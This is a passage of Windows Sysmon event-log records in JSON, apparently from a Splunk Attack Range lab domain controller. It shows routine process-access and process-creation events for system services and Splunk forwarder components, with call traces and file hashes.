C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6583,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1277-5F25-0000-001054580900}\r\nTargetProcessId: 4752\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1277-5F25-0000-001054580900}","TargetProcessId":"4752","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6584,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.939\r\nSourceProcessGUID: {E2A3D6B1-1277-5F25-0000-001054580900}\r\nSourceProcessId: 4752\r\nSourceThreadId: 4484\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.939","SourceProcessGUID":"{E2A3D6B1-1277-5F25-0000-001054580900}","SourceProcessId":"4752","SourceThreadId":"4484","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6585,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nProcessGuid: {E2A3D6B1-1278-5F25-0000-0010285A0900}\r\nProcessId: 2548\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","ProcessGuid":"{E2A3D6B1-1278-5F25-0000-0010285A0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6586,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1278-5F25-0000-0010285A0900}\r\nTargetProcessId: 2548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1278-5F25-0000-0010285A0900}","TargetProcessId":"2548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6587,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1278-5F25-0000-0010285A0900}\r\nTargetProcessId: 2548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1278-5F25-0000-0010285A0900}","TargetProcessId":"2548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6588,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6589,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6590,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6591,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 